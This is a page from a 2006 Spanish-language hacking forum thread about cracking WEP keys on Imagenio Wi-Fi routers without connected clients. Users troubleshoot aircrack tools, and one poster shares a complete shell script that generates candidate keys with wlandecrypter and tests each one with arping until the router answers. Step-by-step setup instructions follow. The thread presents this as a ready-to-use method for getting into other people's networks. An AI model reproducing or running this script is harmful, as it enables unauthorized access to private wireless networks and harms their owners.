elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 08:58  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless (Moderadores: Uxio, pianista, ChimoC)
| | |-+  descifrar redes IMAGENIO sin clientes y sin paquetes ;)
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 Ir Abajo Respuesta Imprimir
Autor Tema: descifrar redes IMAGENIO sin clientes y sin paquetes ;)  (Leído 46,724 veces)
ZariK

Desconectado Desconectado

Ver Perfil
Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
« Respuesta #150 en: 24 Octubre 2006, 23:50 »

Tertulia me podria decir paso x paso q haces  para hacerlo bien?? yo es q creo q no voy mal encaminado xo nunk doy cn la clave, nunk mejor dixo... Pliz ponme algun post dond expongas tus directrices, haber si asi x fin lo consigo.

Gracias. Saludos

P.D:uso una ipw2200 x si sirve de algo ^^

alrivas

Ver Perfil
« Respuesta #151 en: 25 Octubre 2006, 11:01 »

Hola a todos:

Mi problema es que en el momento que uso ./wlandestroyer en una consola, se me cuelga en la otra el aireplay -4.

Uso una pcmcia con chip ralink rt2500, quizás no permita hacer las dos cosas a la vez.

El caso es que he probado a ejecutar el wlandestroyer con la ralink y el aireplay con la wifi del portátil (ipw2200) y ahi no se me cuelga, pero no me captura ningún ARP. Las dos tarjetas están en modo monitor e iniciadas en el canal de la red.

Alguna idea??

Un saludo.

ZariK

Ver Perfil
« Respuesta #152 en: 25 Octubre 2006, 12:34 »

Me pasa lo mismo q a ti alrivas... quizas pueda ser x el arping q hay q cambiar el codigo del wlandestroyery dnd pone 192.168.1.1 cambiarlo por $3. haber si alguien no hexa una mano.

Gracias. Saludos
bienpiyao

Ver Perfil
« Respuesta #153 en: 25 Octubre 2006, 21:10 »

Buenas!! es genial el trabajo que haceis, me estoy iniciando en estos temas y aunque no me faltan ganas e ilusión, es mucho más fácil aprender si existen personas como ustedes...gracias!! Tengo una duda:

ejecuto el airodump y empieza a monitorizar paketes, en otra consola  inicio el aireplay y se pone a leer paquetes, el siguiente paso era generar el archivo de claves, he aki mi duda. Tengo que parar el airodump o el airoplay para hacerlo?? abro una nueva consola?? el airoplay se para solo al terminar?? o se keda ahí hasta que lo pare?

Ahora mismo va por más de 9000 paquetes leidos con aireplay pero no sé si tengo que esperar o pararlo, o abrir otra consola. Espero ideas. Gracias.

ReSPeCT
tertulia

Ver Perfil
« Respuesta #154 en: 25 Octubre 2006, 22:11 »

Buenas!! es genial el trabajo que haceis, me estoy iniciando en estos temas y aunque no me faltan ganas e ilusión, es mucho más fácil aprender si existen personas como ustedes...gracias!! Tengo una duda:

ejecuto el airodump y empieza a monitorizar paketes, en otra consola  inicio el aireplay y se pone a leer paquetes, el siguiente paso era generar el archivo de claves, he aki mi duda. Tengo que parar el airodump o el airoplay para hacerlo?? abro una nueva consola?? el airoplay se para solo al terminar?? o se keda ahí hasta que lo pare?

Ahora mismo va por más de 9000 paquetes leidos con aireplay pero no sé si tengo que esperar o pararlo, o abrir otra consola. Espero ideas. Gracias.

ReSPeCT
Extracto de la primera página:
Cuando el script pase por la clave correcta el AP respondera con un arp y en la consola en la que esta el aireplay saldra un paquete, pulsais "y" para que se guarde y entonces el aireplay intentara hacer un chop-chop... pulsais Control+C para que no lo haga puesto que no nos interesa. Hacemos lo mismo en la consola donde esta el script para que no siga probando claves.
bienpiyao

Ver Perfil
« Respuesta #155 en: 25 Octubre 2006, 22:45 »

ReSPeCT
Extracto de la primera página:
Cuando el script pase por la clave correcta el AP respondera con un arp y en la consola en la que esta el aireplay saldra un paquete, pulsais "y" para que se guarde y entonces el aireplay intentara hacer un chop-chop... pulsais Control+C para que no lo haga puesto que no nos interesa. Hacemos lo mismo en la consola donde esta el script para que no siga probando claves.

Creo que no has entendido mi pregunta, para poder hacer lo que dices, tengo que generar el archivo de claves, pero no sé si tengo que parar el aireplay o no para hacerlo o lo puedo hacer en otra consola a parte. Ahora mismo el aireplay lleva ya leidos 52.000 paquetes. Y es que no sé si para solo o lo tengo que parar, o esperar a que lea un determinado número de paquetes o que.

ReSPeCT
cohone

Ver Perfil
« Respuesta #156 en: 25 Octubre 2006, 22:59 »

Tal vez os interese mi modificación del script. Te muestra directamente la clave sin necesidad de nada más que ejecutar el script. No se si ya se le ha ocurrido a alguien, supongo que sí, pero no me apetece leerme todo el post  ;D ;D
lo único que necesitais es tener el wlandecrypter en el path o modificar la línea y poner la ruta completa.

Como dato, acabo de petar una para probarlo y ha tardado 15min en sacarla probando 25350 keys.

Bueno, si el ap está muy saturado, es posible que no reponda en los 10ms que le tengo puesto para que espere la respuesta arp.

Nada, probadlo a ver que tal.

#!/bin/sh

#
# ENTRADAS:
#
# $1 : Interfaz
# $2 : Essid
# $3 : AP
# $4 : Channel
#

if [ $# -lt 4 ]; then
echo "$0 '[Interfaz] [Essid] [AP] [Chan] '"
exit 1
fi

rm tmp.keys
wlandecrypter $3 $2 tmp.keys

iwconfig $1 mode managed
iwconfig $1 essid $2
iwconfig $1 ap $3
iwconfig $1 channel $4
iwconfig $1 key s:AAAAAAAAAAAAA

echo -n " * Esperando conexion: "
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
        echo -n "."
        sleep 1;
done
echo " OK"

ifconfig $1 192.168.1.254

count=0
count_echo=0

for i in `cat tmp.keys`; do
iwconfig $1 key s:$i

while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
        echo -en "\r * Conexion perdida, esperando..."
        sleep 1;
done

arping2 -i$1 -c1 192.168.1.1 -w10000 > /dev/null 2>&1

if [ $? -eq 0 ]; then
        echo -en "\nKey:"
        echo $i
        exit 0
        fi

count=$((count+1))
        count_echo=$((count_echo+1))
        if [ $count_echo -ge 50 ]; then
                echo -en "\r * Claves probadas: $count"
                count_echo=0
        fi
done
« Última modificación: 27 Octubre 2006, 00:20 por cohone » En línea
tertulia

Ver Perfil
« Respuesta #157 en: 26 Octubre 2006, 01:17 »

Ahora, no no tienes que pararlo, abre otra ventana y lo generas/root/wlandestroy.sh ath0 WLAN_XX 00:XX:XX:XX:XX:XX 7 (suponiendo que sea canal 7) loquequieras.txt
Salu2
alrivas

Ver Perfil
« Respuesta #158 en: 26 Octubre 2006, 09:24 »

Hola a todos:

Mi problema es que en el momento que uso ./wlandestroyer en una consola, se me cuelga en la otra el aireplay -4.

Uso una pcmcia con chip ralink rt2500, quizás no permita hacer las dos cosas a la vez.

El caso es que he probado a ejecutar el wlandestroyer con la ralink y el aireplay con la wifi del portátil (ipw2200) y ahi no se me cuelga, pero no me captura ningún ARP. Las dos tarjetas están en modo monitor e iniciadas en el canal de la red.

Alguna idea??

Un saludo.

Buenas de nuevo, he solucionado el problema adquiriendo una pcmcia con chipset Atheros. Perfecto a la primera. Así que para el que le sirva de ayuda, las tarjetas con chipset RALINK 2500, al menos, con los drivers de TROPPIX 1.2, no permite ejecutar a la vez el aireplay -4 y el script wlandestroy.

Espero aclarar algo.

Un saludo.
bienpiyao

Ver Perfil
« Respuesta #159 en: 26 Octubre 2006, 14:56 »

tertulia muchas gracias por la info, aunque ya me dí cuenta, porque me cansé de esperar y abrí otra consola y creé el archivo de claves jejeje, pero de todos modos, gracias!!.

ReSPeCT
ZariK

Ver Perfil
« Respuesta #160 en: 26 Octubre 2006, 15:28 »

cohone, podrias explicarme mejor tu técnica??? uso una ipw2200 y una atheros w108pcm x si ac falta... Cuales son los paso a seguir??
(paso a paso, q no soy muy experimentado) , es q cn el metodo de nilp0inter no e obtenido los resultados esperados (no conseguia el ARP). Uso el live cd de backtrack 2.0, lo digo x el tema del arping q en tu script lo tienes puesto cm arping2 y nose sin con backtrack funciona cn arping2 o arping a sekas...

Gracias. Saludos

P.D: si funciona tu método mil gracias y posterare los resultados, pliz dame los pasitos poko a poko para conseguirlo. :-)
usb_enabled

COLLEJATOR

Ver Perfil WWW
« Respuesta #161 en: 26 Octubre 2006, 17:20 »

cohones k bien :) osea k con tu script exactamente k necesitas? no necesitas generar archivo de claves ni el tinglao del airplay? mala epoca pa imagenio
cohone

Ver Perfil
« Respuesta #162 en: 27 Octubre 2006, 00:16 »

cohones k bien smiley osea k con tu script exactamente k necesitas? no necesitas generar archivo de claves ni el tinglao del airplay? mala epoca pa imagenio
El script es el mismo que el NilpOinter, solo he modificado lo que está en negrita.

Le he puesto que te cree automáticamente el fichero de claves.

Y he modificado el comando arping2 para que espere a recibir un arp(que para eso sirve el comando) durante 10ms. Después compruebo el valor que devuelve el comando,0 si responden al arp, en ese caso ya se la key, la que está utilizando en ese momento.

cohone, podrias explicarme mejor tu técnica??? uso una ipw2200 y una atheros w108pcm x si ac falta... Cuales son los paso a seguir??
(paso a paso, q no soy muy experimentado) , es q cn el metodo de nilp0inter no e obtenido los resultados esperados (no conseguia el ARP). Uso el live cd de backtrack 2.0, lo digo x el tema del arping q en tu script lo tienes puesto cm arping2 y nose sin con backtrack funciona cn arping2 o arping a sekas...

Son similares a los de Nilp0int.
1. copias el script y lo pegas en un fichero (llamalo como te de la gana)
2. ejecutas chmod +x 'nombre de script'
3. Instalar el arping2 si no lo tienes
4. Instalar el wlandecrypter si no lo tienes

Estos dos últimos ficheros deben estar en el PATH (se deben poder ejecutar desde cualquier directorio)

5. ejecutar el script con los parámetros de siempre

script.sh [Interfaz] [Essid] [AP] [Chan]
(ahora modifico el script para que no se necesite el parámetro [keys])
y el Interface se usa en modo managed (normal, no monitor)

cohone

Ver Perfil
« Respuesta #163 en: 27 Octubre 2006, 00:31 »

Uso el live cd de backtrack 2.0, lo digo x el tema del arping q en tu script lo tienes puesto cm arping2 y nose sin con backtrack funciona cn arping2 o arping a sekas...
Creo que si funcionaría con arping en vez de con arping2
cambia
Código:
arping2 -i$1 -c1 192.168.1.1 -w10000 > /dev/null 2>&1
por
Código:
arping -I$1 -c1 -w10000  192.168.1.1 > /dev/null 2>&1
ZariK

Ver Perfil
« Respuesta #164 en: 31 Octubre 2006, 15:08 »

Graciass cohone!!!

Esta tarde lo prueba y te comento!!

Saludos.
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 Ir Arriba Respuesta Imprimir 

Ir a: